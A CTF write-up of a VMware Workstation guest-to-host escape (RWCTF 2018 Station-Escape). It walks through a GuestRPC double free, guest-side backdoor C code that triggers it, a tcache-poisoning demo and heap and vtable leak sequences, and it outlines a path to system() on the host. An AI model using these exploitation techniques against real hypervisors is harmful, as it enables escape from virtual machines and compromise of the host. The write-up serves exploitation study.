Pwning VMWare, Part 1: RWCTF 2018 Station-Escape
https://nafod.net/blog/2019/12/21/station-escape-vmware-pwn.html

The bug

Examining the changes, we find that they're all in request type 5, corresponding to GUESTRPC_FINALIZE. The user-controlled argument is masked with 0x21 and passed into guestrpc_close_backdoor as the a3 parameter below.

void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3)
{
  __int64 v3; // rbx
  void *v4; // rdi

  v3 = a1;
  v4 = *(void **)(a1 + 8);
  if ( a3 & 0x20 )
  {
    free(v4);
  }
  else if ( !(a3 & 0x10) )
  {
    sub_176D90(v3, 0);
    if ( *(_BYTE *)(v3 + 0x20) )
    {
      vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
      guestrpc_close_channel(a2);
      *(_BYTE *)(v3 + 32) = 0;
    }
  }
}

Control of a3 lets us take the first branch in a previously unreachable way, freeing the buffer pointed to by a1+0x8, which is the buffer used internally to store the reply data passed back to the user. However, this same buffer is also freed by command type 6, GUESTRPC_CLOSE, giving us a controlled double free that we can turn into a use-after-free. (The other patch nop'd out the code responsible for NULLing out the reply buffer pointer, which would otherwise have prevented this code path from being exploited.)
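To make the trigger concrete, here is a rough guest-side sketch of the GuestRPC interface, following the open-vm-tools backdoor convention (magic 0x564D5868 in EAX, command 0x1E in the low half of ECX, the request type in the high half, the channel id in the high half of EDX, I/O port 0x5658). The helper names, the exact register role of the FINALIZE argument, and the 0x21 flag value are my assumptions, so treat this as an illustration rather than the original exploit code:

/*
 * Guest-side GuestRPC sketch. Assumptions: open-vm-tools backdoor register
 * layout; helper names are mine, not from the original exploit.
 */
#include <stdint.h>
#include <sys/io.h>   /* iopl() */

#define BDOOR_MAGIC        0x564D5868u   /* "VMXh" */
#define BDOOR_PORT         0x5658u
#define BDOOR_CMD_MESSAGE  0x1E

/* GuestRPC request types, matching the numbering used in the write-up */
#define GUESTRPC_OPEN      0
#define GUESTRPC_SENDLEN   1
#define GUESTRPC_SENDDATA  2
#define GUESTRPC_RECVLEN   3
#define GUESTRPC_RECVDATA  4
#define GUESTRPC_FINALIZE  5   /* request type 5: the buggy path */
#define GUESTRPC_CLOSE     6   /* request type 6: frees the reply buffer again */

struct bdoor_regs { uint32_t eax, ebx, ecx, edx, esi, edi; };

/* Call once, as root inside the guest, so ring-3 port I/O is permitted. */
static int backdoor_init(void)
{
    return iopl(3);
}

/* One low-bandwidth backdoor transaction; results come back in the registers. */
static void backdoor(struct bdoor_regs *r)
{
    __asm__ volatile("in %%dx, %%eax"
                     : "+a"(r->eax), "+b"(r->ebx), "+c"(r->ecx),
                       "+d"(r->edx), "+S"(r->esi), "+D"(r->edi));
}

/* Issue one GuestRPC request of the given type on a channel. */
static struct bdoor_regs guestrpc(uint16_t chan, uint16_t type, uint32_t arg)
{
    struct bdoor_regs r = {
        .eax = BDOOR_MAGIC,
        .ebx = arg,   /* for FINALIZE, this is the value masked with 0x21 on the host */
        .ecx = BDOOR_CMD_MESSAGE | ((uint32_t)type << 16),
        .edx = BDOOR_PORT | ((uint32_t)chan << 16),
    };
    backdoor(&r);
    return r;
}

/* The bug: FINALIZE with bit 0x20 set frees the reply buffer, and a later
 * CLOSE on the same channel frees it a second time. */
static void double_free_reply(uint16_t chan)
{
    guestrpc(chan, GUESTRPC_FINALIZE, 0x21);
    guestrpc(chan, GUESTRPC_CLOSE, 0);
}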

Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:

  • Obtain a leak, ideally of the vmware-vmx binary text section
  • Use tcache to allocate a chunk on top of a function pointer (the standalone snippet after this list illustrates the underlying trick)
  • Obtain rip and rdi control and invoke system("/usr/bin/xcalc &")
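The tcache step is the standard glibc primitive: corrupt the fd pointer of a freed chunk so that a later allocation of the same size returns an address of our choosing. For reference, a self-contained illustration in plain C against a pre-safe-linking glibc (2.27-era); nothing in it is VMware-specific:

#include <stdio.h>
#include <stdlib.h>

/* Stand-in for a function pointer slot we would like malloc to hand back. */
static long fake_target = 0x41414141;

int main(void)
{
    long *a = malloc(0x48);
    long *b = malloc(0x48);
    free(a);
    free(b);                     /* tcache bin for size 0x50 now holds: b -> a */

    /* Simulate the use-after-free write: redirect b's fd to our target. */
    *(void **)b = &fake_target;

    malloc(0x48);                /* returns b; the bin head becomes &fake_target */
    long *win = malloc(0x48);    /* returns &fake_target */
    *win = 0xdeadbeef;           /* the "function pointer" is now attacker data */

    printf("fake_target = 0x%lx\n", fake_target);
    return 0;
}

In the real target the corrupting write has to go through the dangling guestrpc reply buffer rather than a local pointer, but the allocator behaviour being abused is the same.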

Heap internals and obtaining a leak

Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap region used for guestrpc requests. This means the exploit can be relatively reliable even if the VM has been running for a while or the user was previously using the system.

In order to obtain a heap leak, we'll perform the following series of operations (a code sketch follows the list):

  1. Allocate three channels [A], [B], and [C]
  2. Send the info-set command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap
  3. Open channel [B] and issue an info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed
  7. Close channel [B], freeing the buffer again
  8. Read out the reply on channel [C] to leak heap data from the freed chunk
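Continuing the earlier sketch, that sequence looks roughly like the following. The wrappers rpc_open(), rpc_send(), rpc_recv_len() and rpc_recv_data() are hypothetical conveniences standing in for the open/send-length/send-data/receive boilerplate; only guestrpc() and the request-type constants come from the snippet above:

/* Hypothetical wrapper prototypes; assumed, not from the original exploit. */
uint16_t rpc_open(void);
void     rpc_send(uint16_t chan, const char *cmd);
uint32_t rpc_recv_len(uint16_t chan);
void     rpc_recv_data(uint16_t chan, void *out, uint32_t len);

void leak_heap_pointer(void)
{
    uint16_t A = rpc_open();                          /* step 1: three channels */
    uint16_t B = rpc_open();
    uint16_t C = rpc_open();

    rpc_send(A, "info-set guestinfo.leak AAAABBBB");  /* step 2: data lands in the host heap */

    rpc_send(B, "info-get guestinfo.leak");           /* step 3 */
    uint32_t len = rpc_recv_len(B);                   /* step 4: reply length... */
    char tmp[128];
    rpc_recv_data(B, tmp, len < sizeof(tmp) ? len : sizeof(tmp));  /* ...and reply read */

    guestrpc(B, GUESTRPC_FINALIZE, 0x21);             /* step 5: buggy free of B's reply buffer */

    rpc_send(C, "info-get guestinfo.leak");           /* step 6: C's reply reuses the freed chunk */
    rpc_recv_len(C);

    guestrpc(B, GUESTRPC_CLOSE, 0);                   /* step 7: the chunk is freed again under C */

    char leak[128];
    rpc_recv_data(C, leak, sizeof(leak));             /* step 8: stale reply -> heap pointer */
}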

Each vmware-vmx process has a number of associated threads, including one thread per guest vCPU. This means the underlying glibc heap has both the tcache mechanism active and several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning the guest to a single core (a sched_setaffinity sketch follows the thread listing below), we still cannot directly leak a libc pointer this way: only the main_arena lives inside libc itself, while our allocations are served from a per-thread arena in a separate mapping. What we leak is therefore a pointer into that thread arena, which is less useful in our case.

[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED
[#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED
[#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED
[#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED
[#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED
[#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED
[#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED   <-- our vCPU thread
[#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED
[#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED
[#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED
[#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED
...
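The pinning itself is a one-liner in the guest; a minimal sketch (the choice of CPU 0 is arbitrary):

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>

/* Keep the exploit process on a single vCPU so every backdoor request is
 * handled by the same host thread and, per the discussion above, the same
 * tcache. */
static int pin_to_cpu0(void)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(0, &set);
    if (sched_setaffinity(0, sizeof(set), &set) != 0) {
        perror("sched_setaffinity");
        return -1;
    }
    return 0;
}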

To get around this limitation, we'll modify the above flow to spray some other object that carries a vtable pointer. I came across this writeup by Amat Cama, which detailed his 2017 exploitation using drag-n-drop and copy-paste structures; these are allocated in the host vCPU heap when you send the corresponding guestrpc command.

Therefore, I updated the above flow as follows to leak out a vtable/vmware-vmx-bss pointer (the delta relative to the earlier sketch appears after the list):

  1. Allocate four channels [A], [B], [C], and [D]
  2. Send the info-set command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap
  3. Open channel [B] and issue an info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed
  7. Close channel [B], freeing the buffer again
  8. Send vmx.capability.dnd_version on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]
  9. Read out the reply on channel [C] to leak the vtable pointer
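Only the spray and the final read differ from the earlier sketch; the tail end would look roughly like this, again using the hypothetical wrappers, with VMX_VTABLE_OFFSET standing in for a build-specific constant I have not verified:

    uint16_t D = rpc_open();                      /* opened alongside A, B, C in step 1 */

    /* ... steps 2-7 as in the earlier heap-leak sketch ... */

    rpc_send(D, "vmx.capability.dnd_version");    /* step 8: vtable object lands on the stale chunk */

    uint8_t leak[0x40];
    rpc_recv_data(C, leak, sizeof(leak));         /* step 9: stale reply now starts with a vtable pointer */

    uint64_t vtable   = *(uint64_t *)leak;
    uint64_t vmx_base = vtable - VMX_VTABLE_OFFSET;  /* placeholder offset; rebase vmware-vmx from the leak */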

One thing I did notice is that the copy-paste and drag-n-drop structures appear to allocate their vtable-containing objects only once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read and write primitive, maybe with these heap constructions alone. From there, we could trace backwards to leak our vmx binary.

 
